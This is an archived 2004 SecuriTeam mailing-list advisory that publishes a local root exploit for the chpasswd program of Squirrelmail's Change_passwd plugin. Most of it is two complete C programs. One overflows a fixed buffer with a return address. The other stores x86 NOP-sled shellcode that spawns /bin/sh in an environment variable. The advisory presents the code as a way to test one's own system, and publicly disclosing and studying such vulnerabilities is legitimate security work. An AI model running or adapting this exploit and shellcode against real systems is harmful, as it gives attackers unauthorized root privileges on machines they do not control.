[UNIX] Squirrelmail Change_passwd Buffer Overflow Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/04

  • Next message: SecuriTeam: "[REVS] Using GDB for Vulnerability Developement"
    To: list@securiteam.com
    Date: 19 Apr 2004 12:14:39 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Squirrelmail Change_passwd Buffer Overflow Exploit
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article:
    <http://www.securiteam.com/unixfocus/5OP0F2ACKA.html> Squirrelmail
    Change_passwd Buffer Overflow, a vulnerability in the product allows local
    attackers to gain elevated privileges by overflowing an internal buffer.
    The following exploit code can be used to test your system for the
    mentioned vulnerability.

    DETAILS

    Exploit:
    SPK-chpasswd.c:
    /*
    ** Squirremail's chpasswd local root exploit bY SpikE <spike_vrm at
    mail.com>
    ** Bug found bY Matias Neiff <matias at neiff.com.ar>
    **
    ** Usage: Execute setegg before running this exploit
    **
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    #define BUFSIZE 200

    char *Egg;
    int EggAddr;
    char *chpasswd;

    void doExploit()
    {
     char Buffer[BUFSIZE];
     int *Ptr = (int *)Buffer;
     int i;

     fprintf(stdout,"[+] Egg address: %#010x\n",EggAddr);

     // Build evil buffer
     for(i=0;i<BUFSIZE-4;i+=4)
      *Ptr++ = EggAddr;
     *Ptr = 0;

     // eXplot it!!
     execl(chpasswd,"chpasswd",Buffer,"SPK","HACKED",0);

     // If reach here, error
     fprintf(stdout,"[-] %s not found!!!\n",chpasswd);
    }

    int main(int argc, char **argv)
    {
     printf("==[ Squirremail's chpasswd local root exploit bY SpikE
    <spike_vrm@mail.com> ]==\n\n");
     if(argc != 2)
     {
      printf("Usage: %s <chpasswd-full-path>\n\n",argv[0]);
      exit(0);
     }
     chpasswd = argv[1];
     // Get shellcode address
            Egg = getenv("spkEGG");
            EggAddr = (int)&Egg[0];

     if(EggAddr == 0)
     {
      printf("[-] spkEGG not found. Run \"setegg\" first.\n");
      exit(-1);
     }
     doExploit();

     return(0);
    }

    setegg.c:
    /*
    ** EGG generator bY SpikE <spike_vrm@mail.com>
    **
    ** Usage: Execute this file before running the exploit
    **
    */

    #include <stdio.h>
    #include <stdlib.h>

    #define EGGSIZE 300

    char Shellcode[] =
            
    "AAAAAAA\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

            
    "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
     
    "\x4e\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

    int main()
    {
     char EGG[EGGSIZE];
     char *EGGPtr;
     u_long EGGAddr;

     printf("[+] Creating EGG\n");

     memset(EGG,0,EGGSIZE);
     memcpy(EGG,Shellcode,strlen(Shellcode));
     memcpy(EGG,"spkEGG=",7);
     putenv(EGG);

     system("/bin/bash");
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spike_vrm@mail.com> SpikE
    VrM.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[REVS] Using GDB for Vulnerability Developement"

    Relevant Pages

    • [EXPL] qwik-smtpd Format String
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ** The second problem was "fixed" using another char and then ... ** calling the int 0x80 syscall. ... void Usage; ...
      (Securiteam)
    • [EXPL] mtFTPd Server Format String (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... / discovered by darkeagle - xx.10.04 ... build_un(unsigned int retaddr, unsigned int offset, unsigned int base, ... main(int argc, char * argv) ...
      (Securiteam)
    • [EXPL] Samba "send_mailslot()" Buffer Overflow Vulnerability (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... void put_name(char *dest, const char *name, int pad, unsigned int ...
      (Securiteam)
    • [EXPL] Crystal FTP Pro Client LIST Proof of Concept
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[] = ... void auth; ... void handle_cmd (int s, int connfd, char* ip); ...
      (Securiteam)
    • [NEWS] Ventrilo Denial of Service
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char *data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
      (Securiteam)